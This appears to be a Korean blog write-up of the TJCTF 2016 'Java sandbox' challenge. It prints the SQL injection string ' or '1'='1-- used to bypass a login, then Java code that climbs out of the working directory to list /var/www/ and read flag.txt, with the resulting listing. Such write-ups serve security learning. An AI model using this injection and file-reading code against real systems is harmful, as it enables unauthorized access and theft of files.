-
TJCTF - Java sandboxCTF 2016. 5. 31. 22:45
java sandbox 문제는 간단한 sql injection을 거친후에 자바 샌드박스가 등장한다.
웹페이지에서는 다음과같은 쿼리로 샌드박스로 접근하면된다.
[ Query ]
' or '1'='1--
간단하게 샌드박스로 접근 할 수 있으며, 중요한건 필터링이 존재하는 자바샌드박스이다.
플래그는 /var/www/안에 존재한다.
Directory web
File Wrapper.java
File Dockerfile
File flag.txt
Directory etc
File runapi.py
File php.ini
Directory html
/* package whatever; // don't place package name! */ import java.util.*; import java.lang.*; import java.io.*; import java.util.*; import java.nio.charset.Charset; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; public class Main { public static void main (String[] args) throws java.lang.Exception { // your code goes here try { String curDir = System.getProperty("user.dir"); String targetDir = curDir + "/../../var/www/"; File folder = new File(targetDir); File[] listOfFiles = folder.listFiles(); for (int i = 0; i < listOfFiles.length; i++) { if (listOfFiles[i].isFile()) { System.out.println("File " + listOfFiles[i].getName()); } else if (listOfFiles[i].isDirectory()) { System.out.println("Directory " + listOfFiles[i].getName()); } } List<String> strList = Files.readAllLines(Paths.get(targetDir, "flag.txt"), Charset.forName("ISO-8859-1")); for(String str : strList) { System.out.println(str); } } catch (Exception e) { e.printStackTrace(); } } }
'CTF' 카테고리의 다른 글
SECUINSIDE 2016 CYKOR_00001_Patch (0) 2016.07.10 Backdoor CTF - Enter the Matrix (0) 2016.06.07 TJCTF - gravitymud (0) 2016.05.30 Defcon 24 - LEGIT 1,2,3 Patched (0) 2016.05.23 Defcon 24 - easy_prasky (4) 2016.05.23